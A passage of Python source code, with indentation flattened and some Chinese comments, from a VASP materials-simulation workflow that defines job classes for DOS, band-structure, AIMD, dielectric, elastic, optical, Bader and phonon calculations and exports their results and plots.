match = re.search(r'(\d+)$', element)
return int(match.group(1)) if match else None
numbers = [extract_number(elem) for elem in elements_with_numbers]
sorted_pairs = sorted(zip(elements_with_numbers, numbers), key=lambda x: x[1])
sorted_elements_with_numbers = [pair[0] for pair in sorted_pairs]
frame = pd.DataFrame(index=sorted_elements_with_numbers, columns=sorted_elements_with_numbers)
for _icohp in icohps._icohplist.values():
if _icohp._translation != [0, 0, 0]:
continue
frame.loc[_icohp._atom1, _icohp._atom2] = _icohp._icohp[Spin.up]
if Spin.down in _icohp._icohp.keys():
frame.loc[_icohp._atom2, _icohp._atom1] = _icohp._icohp[Spin.down]
frame.to_csv(self.run_dir.joinpath("icohp.csv"))
def post_processing(self, result=None):
if result is None:
result = {}
lobsterout = Lobsterout(self.run_dir.joinpath("lobsterout").as_posix())
result["basis"] = lobsterout.basis_functions
result["charge_spilling"] = lobsterout.charge_spilling
result["best_path"] = self.run_dir.as_posix()
self.extract_icohp()
return result
class DosJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="band_structure", step_type="dos", **kwargs)
@cached_property
def incar(self):
incar = super().incar
if self.function == "mbj":
outcar = Outcar(self.path.joinpath("mbj/scf/OUTCAR").as_posix())
outcar.read_pattern({"CMBJ": r'CMBJ = (.*)'})
if outcar.data["CMBJ"]:
incar["CMBJ"] = outcar.data["CMBJ"][-1][0]
return incar
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/CHGCAR"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/CHG"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def write_dos_file(self, path, data, headers):
np.savetxt(self.run_dir.joinpath(path), data, delimiter=" ", fmt="%10.6f", comments="",
header=" ".join(headers))
def export_tdos(self, tdos, dos):
verify_path(self.run_dir.joinpath("data"))
energy = dos.energies - dos.efermi
self.write_dos_file("data/total-up.dat",
np.vstack([energy, tdos.densities[Spin.up]]).T,
headers=["energy(eV)", "Density"])
if Spin.down in tdos.densities:
self.write_dos_file("data/total-dw.dat",
np.vstack([energy, -tdos.densities[Spin.down]]).T,
headers=["energy(eV)", "Density"])
        # First export the per-element totals
elem_dos = dos.get_element_dos()
for elem, e_dos in elem_dos.items():
self.write_dos_file(f"data/total-up-{elem.name}.dat",
np.vstack([energy, e_dos.densities[Spin.up]]).T,
headers=["energy(eV)", "Density"])
if Spin.down in e_dos.densities:
self.write_dos_file(f"data/total-dw-{elem.name}.dat",
np.vstack([energy, -e_dos.densities[Spin.down]]).T,
headers=["energy(eV)", "Density"])
def export_pdos(self, dos: CompleteDos):
verify_path(self.run_dir.joinpath("data/pdos"))
energy = dos.energies - dos.efermi
ispin = self.incar.get("ISPIN") == 2
el_dos = {}
index_map = {}
for site, atom_dos in dos.pdos.items():
element = site.specie.name
if element not in el_dos:
index_map[element] = 1
el_dos[element] = {Spin.up: np.zeros((energy.shape[0], len(atom_dos)), dtype=np.float64)}
if ispin:
el_dos[element][Spin.down] = el_dos[element][Spin.up].copy()
site_single = {Spin.up: np.zeros_like(el_dos[element][Spin.up])}
if ispin:
site_single[Spin.down] = site_single[Spin.up].copy()
for orb, pdos in atom_dos.items():
for spin, ppdos in pdos.items():
site_single[spin][:, orb.value] += ppdos
headers = ["energy(eV)"] + [Orbital(i).name for i in range(len(atom_dos))] + ["sum"]
self.write_dos_file(
f"data/pdos/site-up-{element}{index_map[element]}.dat",
np.hstack(
[energy.reshape(-1, 1), site_single[Spin.up], site_single[Spin.up].sum(axis=1).reshape(-1, 1)]),
headers
)
if ispin:
self.write_dos_file(
f"data/pdos/site-dw-{element}{index_map[element]}.dat",
np.hstack([energy.reshape(-1, 1), -site_single[Spin.down],
-site_single[Spin.down].sum(axis=1).reshape(-1, 1)]),
headers
)
el_dos[element][Spin.up] += site_single[Spin.up]
if ispin:
el_dos[element][Spin.down] += site_single[Spin.down]
index_map[element] += 1
for elem, total_dos in el_dos.items():
for spin, spin_dos in total_dos.items():
headers = ["energy(eV)"] + [Orbital(i).name for i in range(spin_dos.shape[-1])] + ["sum"]
self.write_dos_file(
f"data/pdos/element-{'up' if spin == Spin.up else 'dw'}-{elem}.dat",
np.hstack([energy.reshape(-1, 1), spin.value * spin_dos,
spin.value * spin_dos.sum(axis=1).reshape(-1, 1)]),
headers
)
def post_processing(self, result=None):
if result is None:
result = {}
vasprun = Vasprun(self.run_dir.joinpath("vasprun.xml"), parse_potcar_file=False )
dos = vasprun.complete_dos
result[f"dos_efermi_{self.function}"] = dos.efermi
result[f"dos_vbm_{self.function}"] = dos.get_cbm_vbm()[1]
result[f"dos_cbm_{self.function}"] = dos.get_cbm_vbm()[0]
result[f"dos_gap_{self.function}"] = dos.get_gap()
self.export_tdos(vasprun.tdos, dos)
if setting.get("ExportProjection", True):
self.export_pdos(dos)
plotter = DosPlotter()
        # Add the DOS of each element
for element, element_dos in dos.get_element_dos().items():
if element_dos is not None:
plotter.add_dos(str(element), element_dos)
plot = plotter.get_plot(xlim=(self.vb_energy, self.cb_energy))
        # Restrict the x-axis ticks to integers; leaving this commented out allows ticks such as 0.5
# plot.xaxis.set_major_locator(MaxNLocator(integer=True))
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("dos.png"), dpi=self.dpi)
return result
class BandStructureJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="band_structure", step_type="band", **kwargs)
@cached_property
def incar(self):
incar = super().incar
if self.function == "mbj":
outcar = Outcar(self.path.joinpath("mbj/scf/OUTCAR").as_posix())
outcar.read_pattern({"CMBJ": r'CMBJ = (.*)'})
if outcar.data["CMBJ"]:
incar["CMBJ"] = outcar.data["CMBJ"][-1][0]
return incar
@cached_property
def kpoints(self):
"""
因为有的体系自洽是用的连续点模式
重写一下
:return:
"""
if self.function in ["gw", "g0w0"]:
return super().kpoints
return BaseKpoints(self.kpoints_type).get_line_kpoints(self.path, self.function, self.structure)
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/CHGCAR"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/CHG"), self.run_dir)
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def calculate_effective_mass(self, distance, energy, kpoint_index):
window_size = 5
        # Half of the fitting window
half_window = window_size // 2
        # Determine the left and right boundaries of the window
left_boundary = max(0, kpoint_index - half_window)
        right_boundary = min(len(energy), kpoint_index + half_window + (window_size % 2))  # keep the window size odd
        # If the window starts at the beginning of the array, extend the right boundary
if left_boundary == 0:
right_boundary = min(len(energy), right_boundary + (half_window - kpoint_index))
        # If the window reaches the end of the array, shift the left boundary
if right_boundary == len(energy):
right_boundary = min(len(energy), kpoint_index + half_window + (window_size % 2))
left_boundary = max(0, right_boundary - window_size)
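        # Unit conversion (editor's gloss): 0.036749 ≈ eV -> Hartree and 0.5291772108 Å is the Bohr radius,
        # so k in 1/Å becomes 1/Bohr. Fitting E ≈ a·k² near the band edge then gives the effective mass in
        # units of the electron mass as m* = 1/(2a), which is what the return statement below evaluates.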
energy *= 0.036749
distance *= 0.5291772108
coefficients = np.polyfit(distance[left_boundary:right_boundary], energy[left_boundary:right_boundary], 2)
return 0.5 / coefficients[0]
    def write_projected_dat(self, filename, distance, energy, projected):
_data = [energy]
headers = [u"distance(1/A)", u"energy(eV)"]
for i in range(projected.shape[-1]):
_data.append(projected[:, :, i])
headers.append(f"projected {Orbital(i).name}")
headers.append("sum")
_data.append(projected.sum(axis=2))
array_to_dat(self.run_dir.joinpath(filename),
np.array(distance), *_data,
headers=headers)
    def export_projected_data(self, bs):
verify_path(self.run_dir.joinpath("data/projected"))
for spin, spin_projection in bs.projections.items():
element_result = {}
element_index={}
for elem in self.structure.composition.elements:
element_index[elem.name]=1
element_result[elem.name] = np.zeros((spin_projection.shape[0], spin_projection.shape[1], spin_projection.shape[2]), dtype=np.float64)
for site_index in range(len(self.structure)):
site=self.structure[site_index].specie.name
site_array=spin_projection[:,:, :, site_index]
element_result[site]+=site_array
self.write_projected_dat(
f"data/projected/site-{'up' if spin == Spin.up else 'dw'}-{site}{element_index[site]}.dat",
bs.distance,
bs.bands[spin]-bs.efermi,
site_array
)
element_index[site]+=1
for elem ,value in element_result.items():
self.write_projected_dat(
f"data/projected/element-{'up' if spin == Spin.up else 'dw'}-{elem}.dat",
bs.distance,
bs.bands[spin] - bs.efermi,
value
)
def export_band_data(self, bs):
spin_map = {Spin.up: "up", Spin.down: "dw"}
for spin, bands in bs.bands.items():
spin_str = spin_map[spin]
array_to_dat(self.run_dir.joinpath(f"data/band-{spin_str}.dat"), np.array(bs.distance), bands - bs.efermi,
headers=[u"distance(1/A)", u"energy(eV)"])
def get_effective_mass(self, bs):
me = 0
mh = 0
try:
if not bs.is_metal():
vbm = bs.get_vbm()
cbm = bs.get_cbm()
spin = list(cbm["band_index"].keys())[0]
index = list(cbm["band_index"].values())[0][0]
me = self.calculate_effective_mass(np.array(bs.distance),
bs.bands[spin][index].copy(),
cbm["kpoint_index"][0])
spin = list(vbm["band_index"].keys())[0]
index = list(vbm["band_index"].values())[0][0]
mh = self.calculate_effective_mass(np.array(bs.distance),
bs.bands[spin][index].copy(),
vbm["kpoint_index"][0]
)
except:
pass
return me, mh
def post_processing(self, result=None):
if result is None:
result = {}
if self.function != "pbe":
force_hybrid_mode = True
else:
force_hybrid_mode = False
if self.kpoints.style in [Kpoints.supported_modes.Line_mode, Kpoints.supported_modes.Reciprocal]:
line_mode = True
else:
line_mode = False
vasprun = BSVasprun(self.run_dir.joinpath("vasprun.xml").as_posix(),
parse_projected_eigen=setting.get("ExportProjection", True)
)
bs = vasprun.get_band_structure(line_mode=line_mode, force_hybrid_mode=force_hybrid_mode)
band_gap = bs.get_band_gap()
vbm = bs.get_vbm()
cbm = bs.get_cbm()
result[f"direct_{self.function}"] = band_gap['direct']
result[f"band_gap_{self.function}"] = band_gap['energy']
result[f"vbm_{self.function}"] = vbm["energy"]
result[f"cbm_{self.function}"] = cbm["energy"]
result[f"efermi_{self.function}"] = bs.efermi
result[f"m_e_{self.function}"], result[f"m_h_{self.function}"] = self.get_effective_mass(bs)
if not line_mode:
return result
if not self.run_dir.joinpath("data").exists():
self.run_dir.joinpath("data").mkdir()
self.export_band_data(bs)
if bs.projections:
self.export_projected_data(bs)
plotter = BSPlotter(bs)
plot = plotter.get_plot(ylim=(self.vb_energy, self.cb_energy), vbm_cbm_marker=True)
plt.savefig(self.run_dir.joinpath(f"band.png"), dpi=self.dpi)
with open(self.run_dir.joinpath(f"data/band_lables.txt"), "w", encoding="utf8") as f:
f.write("distance\tlable\n")
distance = plotter.get_ticks()["distance"]
label = plotter.get_ticks()["label"]
for i in range(len(label)):
f.write(f"{round(distance[i], 6)}\t{label[i]}\n")
return result
class AimdJob(JobBase):
def __init__(self, TEBEG=300, TEEND=300, NSW=3000, **kwargs):
if "ML_LMLFF" in kwargs and kwargs["ML_LMLFF"]:
folder = f"aimd-ml({TEBEG}-{TEEND}k)@{NSW}"
else:
folder = f"aimd({TEBEG}-{TEEND}k)@{NSW}"
super().__init__(step_type="aimd", TEBEG=TEBEG, TEEND=TEEND, NSW=NSW, folder=folder, **kwargs)
def run(self, **kwargs):
if self.check_cover():
return self
return super().run(**kwargs)
def plot_aimd(self, vasprun):
name = vasprun.final_structure.composition.to_pretty_string()
energies = [step["e_0_energy"] for step in vasprun.ionic_steps]
steps = list(range(1, len(energies) + 1))
plt.figure(figsize=(3.5, 2.625))
plt.plot(steps, energies, label=name)
plt.ylabel("E0 Energy(eV)")
plt.xlabel("Time(fs)")
plt.legend()
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("aimd.png"), dpi=self.dpi)
def get_ionic_steps_index(self, vasprun: Vasprun):
index = 0
result = []
ionic_steps = vasprun.ionic_steps
nionic_steps = vasprun.nionic_steps
for md_i, md in enumerate(vasprun.md_data):
if md["energy"]["e_0_energy"] == ionic_steps[index]["e_0_energy"]:
result.append(md_i + 1)
index += 1
if index == nionic_steps:
break
return result
def plot_aimd_ml(self, vasprun):
name = vasprun.final_structure.composition.to_pretty_string()
energies = [step["energy"]["e_0_energy"] for step in vasprun.md_data]
steps = list(range(1, len(energies) + 1))
plt.figure()
plt.plot(steps, energies, label=name)
energies = [step["e_0_energy"] for step in vasprun.ionic_steps]
index = self.get_ionic_steps_index(vasprun)
if len(index) == len(energies):
plt.scatter(index, energies, label="Aimd", s=4, c="red")
plt.ylabel("E0 Energy(eV)")
plt.xlabel("Time(fs)")
plt.legend()
plt.tight_layout()
plt.savefig(self.run_dir.joinpath("aimd-ml.png"), dpi=self.dpi)
def post_processing(self, result=None):
if result is None:
result = {}
"""
:return:
"""
vasprun = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False, parse_dos=False)
if self.incar.get("ML_LMLFF"):
            # Machine-learned force field run
self.plot_aimd_ml(vasprun)
else:
self.plot_aimd(vasprun)
config_type = f"{self.folder}-({self.path.name})-"
write_to_xyz(self.run_dir.joinpath("vasprun.xml"), self.run_dir.joinpath("aimd.xyz"), config_type, append=False)
return result
class StaticDielectricJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="optic_dielectric", step_type="dielectric", **kwargs)
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def post_processing(self, result=None):
if result is None:
result = {}
outcar = Outcar(self.run_dir.joinpath("OUTCAR").as_posix())
result[f"dielectric_electron_{self.function}"] = outcar.dielectric_tensor[0][0]
if self.incar.get("IBRION") == 8:
result[f"dielectric_ionic_{self.function}"] = outcar.dielectric_ionic_tensor[0][0]
else:
result[f"dielectric_ionic_{self.function}"] = 0
return result
class ElasticJob(JobBase):
def __init__(self, **kwargs):
super().__init__(job_type="elastic", step_type="elastic", folder="elastic", **kwargs)
# @cached_property
# def incar(self):
# incar =super().incar
#
#
#
# return incar
def run(self, **kwargs):
if self.check_cover():
return self
# cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
# cp_file(self.path.joinpath(f"{self.function}/scf/CHGCAR"), self.run_dir)
return super().run(**kwargs)
def post_processing(self, result=None):
if result is None:
result = {}
outcar = Outcar(self.run_dir.joinpath("OUTCAR").as_posix())
outcar.read_elastic_tensor()
elastic_tensor = outcar.data["elastic_tensor"]
result["elastic_tensor"] = elastic_tensor
return result
class OpticJob(JobBase):
result_label = ["dielectric_real", "dielectric_imag",
"optic_direct_band_gap", "optic_indirect_band_gap",
"mean", "max", "area"
]
def __init__(self, **kwargs):
super().__init__(job_type="optic_dielectric", step_type="optic", **kwargs)
@cached_property
def incar(self):
incar = super().incar
if self.function in ["bse"]:
incar["NBANDS"] = Wavecar(self.path.joinpath(f"gw/band/WAVECAR").as_posix()).nb
else:
eig = Eigenval(self.path.joinpath(f"{self.function}/scf/EIGENVAL").as_posix())
incar["NBANDS"] = eig.nbands * 2
return incar
def run(self, **kwargs):
if self.check_cover():
return self
cp_file(self.path.joinpath(f"{self.function}/scf/WAVECAR"), self.run_dir)
return super().run(**kwargs)
def post_processing(self, result=None):
if result is None:
result = {}
vasp = Vasprun(self.run_dir.joinpath(f"vasprun.xml"), parse_potcar_file=False)
result[f"dielectric_real_{self.function}"] = vasp.dielectric[1][0][0]
result[f"dielectric_imag_{self.function}"] = vasp.dielectric[2][0][0]
new_en, new_abs = slme.absorption_coefficient(vasp.dielectric)
plt.clf()
plt.xlabel("Photon energy (eV)")
plt.ylabel("Absorption ($cm^{-1}$)")
plt.plot(new_en, new_abs)
plt.xlim((0, 5))
# plt.tight_layout()
plt.savefig(self.run_dir.joinpath(f"absorption_coefficient.png"), dpi=self.dpi)
info = {}
for i, en in enumerate(new_en):
if "start" not in info.keys():
if en >= 1.59:
info["start"] = (i, en)
if en >= 3.26:
info["end"] = (i, en)
break
_max = round(np.max(new_abs[info["start"][0]:info["end"][0]]) / 1e6, 5)
mean = round(np.mean(new_abs[info["start"][0]:info["end"][0]]) / 1e6, 5)
result[f"mean_{self.function}"] = mean
result[f"max_{self.function}"] = _max
result[f"area_{self.function}"] = round(
np.trapz(new_abs[info["start"][0]:info["end"][0]], new_en[info["start"][0]:info["end"][0]]) / 1e6, 5)
plt.clf()
plt.plot(vasp.dielectric[0], vasp.dielectric[1], label="real")
plt.plot(vasp.dielectric[0], vasp.dielectric[2], label="imag")
plt.ylim(-40, 40)
plt.legend()
plt.savefig(self.run_dir.joinpath(f"dielectric-function.png"), dpi=self.dpi)
plt.clf()
return result
class BaderJob(SCFJob):
def __init__(self, **kwargs):
super().__init__(job_type="bader", step_type="scf", folder="bader", **kwargs)
@cached_property
def incar(self):
incar = super().incar
incar["LAECHG"] = True
return incar
def save_summary(self, summary):
with open(self.run_dir.joinpath("ACF.dat"), "w", encoding="utf8") as f:
header = "Id,X,Y,Z,label,charge,transfer,min dist,atomic volume".split(",")
header = [i.center(10) for i in header]
header_text = "".join(header)
f.write(header_text)
f.write("\n")
f.write("-" * 100)
f.write("\n")
for index in range(len(self.structure)):
site = self.structure[index]
line = [index + 1, round(site.x, 4), round(site.y, 4), round(site.z, 4), site.label,
round(summary['charge'][index], 4),
round(summary['charge_transfer'][index], 4),
round(summary['min_dist'][index], 4),
round(summary['atomic_volume'][index], 4)]
line = [str(i).center(10) for i in line]
f.write("".join(line))
f.write("\n")
f.write("-" * 100)
f.write("\n")
f.write(f"vacuum charge : {summary['vacuum_charge']}\n")
f.write(f"vacuum volume : {summary['vacuum_volume']}\n")
f.write(f"bader version : {summary['bader_version']}\n")
def post_processing(self, result=None):
result = super().post_processing(result)
logging.info("\t开始bader电荷分析。")
summary = bader_analysis_from_path(self.run_dir.as_posix())
logging.info("\tbader电荷分析完成。")
self.save_summary(summary)
return result
@requires(Phonopy, "请先安装phonopy!")
class PhonopyJob:
def __init__(self, structure: Structure, path: Path):
self.structure = structure
self.run_path = path.joinpath("pbe/phono")
verify_path(self.run_path)
self.ph_structure = phonopy.get_phonopy_structure(structure)
self.phonon = Phonopy(unitcell=self.ph_structure, supercell_matrix=config["KPOINTS"]["phono"]["super"])
self.phonon.generate_displacements(
distance=0.01,
)
self.disp_supercells = self.phonon.supercells_with_displacements
self.init_supercell = self.phonon.supercell
logging.info(f"一共生成{len(self.disp_supercells)}个结构")
displacements = self.phonon.displacements
# write_disp_yaml(
# displacements=displacements,
# supercell=self.init_supercell,
# filename=self.path.joinpath("phonopy_disp.yaml"),
# )
units = get_default_physical_units("vasp")
phpy_yaml = PhonopyYaml(
physical_units=units, settings={}
)
phpy_yaml.set_phonon_info(self.phonon)
with open(self.run_path.joinpath("phonopy_disp.yaml"), "w") as w:
w.write(str(phpy_yaml))
self.structure.to(self.run_path.joinpath("POSCAR").as_posix(), fmt="poscar")
phonopy.get_pmg_structure(self.init_supercell).to(self.run_path.joinpath("SPOSCAR"), fmt="poscar")
@property
def supercell_structures(self):
index = 1
for cell in self.disp_supercells:
if cell is not None:
s = phonopy.get_pmg_structure(cell)
s.to(self.run_path.joinpath(f"POSCAR-{index:03d}").as_posix(), fmt="poscar")
index += 1
yield s
def set_forces(self, forces):
self.phonon.forces = forces
write_FORCE_SETS(self.phonon.dataset, self.run_path.joinpath("FORCE_SETS"))
self.phonon.produce_force_constants(calculate_full_force_constants=False)
write_FORCE_CONSTANTS(self.phonon.force_constants, filename=self.run_path.joinpath("FORCE_CONSTANTS"),
p2s_map=self.phonon.primitive.p2s_map)
def get_bandstructure(self, plot=True):
kpoint = BaseKpoints().get_line_kpoints(None, function="pbe", structure=self.structure, job_type="phono",
step_type="band")
labels_dict = {a: k for a, k in zip(kpoint.labels, kpoint.kpts) if a != ""}
path = []
labels = []
for k, l in zip(kpoint.kpts, kpoint.labels):
            # Skip duplicated consecutive path points
if path:
if path[-1] == list(k):
continue
else:
path.append(list(k))
else:
path.append(list(k))
if l.strip():
if labels:
if labels[-1] == l.strip():
continue
else:
labels.append(l.strip())
else:
labels.append(l.strip())
path = [path]
qpoints, connections = get_band_qpoints_and_path_connections(path, npoints=kpoint.num_kpts,
rec_lattice=self.structure.lattice.reciprocal_lattice.matrix)
self.phonon.run_band_structure(qpoints, path_connections=connections, labels=labels)
self.phonon.write_yaml_band_structure(None, filename=self.run_path.joinpath("band.yaml"))
        # Not fully worked out yet; it looks like a plotting issue in pymatgen's PhononBSPlotter, so it is set aside for now
# qpoints = np.vstack(qpoints)
# print(qpoints.shape)
# self.phonon.run_qpoints(qpoints)
# frequencies = self.phonon.band_structure.frequencies
# frequencies = np.vstack(frequencies).T
# frequencies = self.phonon.qpoints.frequencies.T
# print(frequencies.shape)
# phono_bandstructure=PhononBandStructureSymmLine(qpoints, frequencies, self.structure.lattice, labels_dict=labels_dict)
if plot:
self.phonon.plot_band_structure().savefig(self.run_path.joinpath("phonon_bandstructure.png"), dpi=150)
# plotter = PhononBSPlotter(phono_bandstructure)
# plotter.save_plot(self.run_path.joinpath("phonon_bandstructure.png"))
# return phono_bandstructure
class VaspTool:
def __init__(self, cores: int = None,
mpirun_path: Path = "mpirun",
vasp_path: Path = "vasp_std",
force_coverage: bool = False,
kpoints_type="Gamma",
functions: list = ["pbe"],
dft_u=False,
disable_relaxation=False,
open_soc=False,
incar_args={}
):
"""
:param cores: 指定运行的核数,如不指定,就默认使用本机最大核数
:param mpirun_path: 如果没有设置环境变量,则需要设置下路径。
有环境变量默认即可
:param vasp_path: 如果没有设置vasp环境变量,则需要设置下路径。
有环境变量默认即可
:param force_coverage: 是否强制覆盖重复计算,
如果为False,计算前,如果存在4个输入文件以及OUTCAR,
他们文件内容一致,就不再进行计算。
如果为True,则不检查文件,直接计算。
:param functions:要使用的泛函方式 pbe hse
:param dft_u:是否开启加U
:param disable_relaxation:禁止优化
:param open_soc:使用vasp_ncl
"""
if cores is None:
cores = os.cpu_count()
else:
cores = cores
self.mpirun_path = mpirun_path
self.vasp_path = vasp_path
self.functions = functions
self.disable_relaxation = disable_relaxation
self.fermi = 0
        # Columns added by the individual calculations are aggregated here
self.check_params()
self.job_args = {
"dft_u": dft_u,
"kpoints_type": kpoints_type,
"open_soc": open_soc,
"force_coverage": force_coverage,
"mpirun_path": self.mpirun_path,
"vasp_path": self.vasp_path,
"cores": cores
}
self.incar_args = incar_args
def check_params(self):
"""
做一些自检 包括泛函选择、vasp路径等
:return:
"""
        if not all(item in FUNCTION_TYPE for item in self.functions):
raise ValueError(f"function目前只支持{'、'.join(FUNCTION_TYPE)}")
if not (self.vasp_path.exists()):
vasp_std_path = get_command_path(self.vasp_path)
if vasp_std_path:
self.vasp_path = Path(vasp_std_path)
else:
raise ValueError(f"找不到文件:{self.vasp_path}")
if not (self.mpirun_path.exists()):
mpirun_path = get_command_path("mpirun")
if mpirun_path:
self.mpirun_path = Path(mpirun_path)
else:
raise ValueError(f"找不到文件:{self.mpirun_path}")
logging.info("计算泛函为:" + "、".join(self.functions))
logging.info(f"mpirun路径:{self.mpirun_path}")
logging.info(f"VASP路径:{self.vasp_path}" + "\t开启soc后会自动切换到同目录下的ncl版本")
def set_plot_setting(self, cbm: int, vbm: int, dpi: int):
self.vb_energy = vbm
self.cb_energy = cbm
self.dpi = dpi
self.job_args["vb_energy"] = vbm
self.job_args["cb_energy"] = cbm
self.job_args["dpi"] = dpi
def plot_bs_dos(self, bs_path: Path, dos_path: Path, file_path: Path):
"""
画出能带Dos组合图
:param bs_path: 这里必须是具体到计算能带的vasprun.xml的路径
:param dos_path: 这里必须是具体到计算dos的vasprun.xml的路径
:param file_name: 要保存的图片路径,这里是路径。比如./band.png
:return:
"""
if not (os.path.exists(bs_path) and os.path.exists(dos_path)):
logging.warning("必须计算完能带和dos后才能画能带dos图")
return
dos_vasprun = Vasprun(dos_path.as_posix(), parse_potcar_file=False)
bs_vasprun = BSVasprun(bs_path.as_posix(), parse_projected_eigen=True)
        # Get the DOS data
dos = dos_vasprun.complete_dos
bands = bs_vasprun.get_band_structure(line_mode=True)
plotter = BSDOSPlotter(bs_projection="elements", dos_projection="orbitals",
vb_energy_range=-self.vb_energy, cb_energy_range=self.cb_energy, fixed_cb_energy=True,
fig_size=(8, 6))
        # Draw the combined plot
plot = plotter.get_plot(bands, dos)
plt.savefig(file_path, dpi=self.dpi)
def count_optic_dielectric_by_gw_bse(self, structure_info: pd.Series, path: Path):
band_job = BandStructureJob(structure=self.structure, path=path, function="gw", **self.job_args,
**self.incar_args)
band_job.run()
band_job.post_processing(structure_info)
optic_job = OpticJob(structure=self.structure, path=path, function="bse", **self.job_args, **self.incar_args)
cp_file(band_job.run_dir.joinpath("WAVE*"), optic_job.run_dir)
cp_file(band_job.run_dir.joinpath("*.tmp"), optic_job.run_dir)
optic_job.run(remove_wavecar=True)
optic_job.post_processing(structure_info)
return structure_info
def count_optic(self, structure_info: pd.Series, path: Path):
self.structure = structure_info["structure"]
        # Structure relaxation
# return self.count_optic_dielectric_by_gw_bse(structure_info,path)
for function in self.functions:
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
            # SCF self-consistent calculation
scf_job = SCFJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
scf_job.post_processing(structure_info)
optic_job = OpticJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(remove_wavecar=True)
optic_job.post_processing(structure_info)
structure_info[structure_info.index != 'structure'].to_csv(
path.joinpath(f"{function}/result_{function}.csv"))
structure_info["structure"] = self.structure
return structure_info
def count_dielectric(self, structure_info: pd.Series, path: Path):
self.structure = structure_info["structure"]
        # Structure relaxation
# return self.count_optic_dielectric_by_gw_bse(structure_info,path)
for function in self.functions:
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
            # SCF self-consistent calculation
scf_job = SCFJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
scf_job.post_processing(structure_info)
            # Static dielectric constant calculation
dielectric_job = StaticDielectricJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(
remove_wavecar=True)
dielectric_job.post_processing(structure_info)
structure_info[structure_info.index != 'structure'].to_csv(
path.joinpath(f"{function}/result_{function}.csv"))
structure_info["structure"] = self.structure
return structure_info
def calculate_band_by_gw(self, path, function):
band_job = BandStructureJob(structure=self.structure, path=path, function="gw", **self.job_args,
**self.incar_args)
band_job.run(remove_wavecar=True)
result = band_job.post_processing()
def count_band_structure(self, structure_info, path: Path = "./", channl="banddos") -> pd.Series:
self.structure: Structure = structure_info["structure"]
for function in self.functions:
            # SCF self-consistent calculation
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="band_structure", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
if function in ["gw"]:
self.calculate_band_by_gw(path, function=function)
scf_job = SCFJob(structure=self.structure, path=path,
job_type="band_structure", function=function,
**self.job_args, **self.incar_args).run()
scf_job.post_processing(structure_info)
if "dos" in channl:
dos_job = DosJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(remove_wavecar=True)
dos_job.post_processing(structure_info)
dos_vasprun = dos_job.run_dir.joinpath(f"vasprun.xml")
else:
                dos_vasprun = path.joinpath(f"{function}/dos/vasprun.xml")
if "band" in channl:
band_job = BandStructureJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(
remove_wavecar=True)
band_job.post_processing(structure_info)
band_vasprun = band_job.run_dir.joinpath(f"vasprun.xml")
else:
band_vasprun = path.joinpath(f"{function}/band/vasprun.xml")
self.plot_bs_dos(band_vasprun, dos_vasprun,
path.joinpath(f"{function}/band_structure_dos_{function}.png"))
structure_info[structure_info.index != 'structure'].to_csv(
path.joinpath(f"{function}/result_{function}.csv"))
structure_info["structure"] = self.structure
return structure_info
def count_cohp(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure,
path=path,
job_type="band_structure",
function="pbe",
**self.job_args, **self.incar_args
).run()
self.structure = job.final_structure
count = 1
best_result = None
all_possible_basis = Lobsterin.get_all_possible_basis_functions(self.structure,
get_pot_symbols(self.structure.species))
logging.info(f"可能的基组个数:{len(all_possible_basis)}")
for basis_setting in all_possible_basis:
            # SCF self-consistent calculation
cohp_job = LobsterJob(
test=count,
structure=self.structure,
path=path,
job_type="cohp",
function="pbe",
**self.job_args, **self.incar_args
)
cohp_job.build_lobster(basis_setting)
cohp_job.run()
cohp_job.run_lobster()
result = cohp_job.post_processing()
result["basis"] = basis_setting
if best_result is None:
best_result = result
else:
if result["charge_spilling"] < best_result["charge_spilling"]:
best_result = result
count += 1
if best_result:
for k, v in best_result.items():
structure_info[k] = v
structure_info[structure_info.index != 'structure'].to_csv(path.joinpath(f"pbe/cohp/result.csv"))
return structure_info
def count_aimd(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="aimd", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
aimd_job = AimdJob(
structure=self.structure, path=path,
job_type="aimd", function="pbe",
**self.job_args, **self.incar_args
)
aimd_job.run(remove_wavecar=True)
aimd_job.post_processing(
)
return structure_info
def count_elastic(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
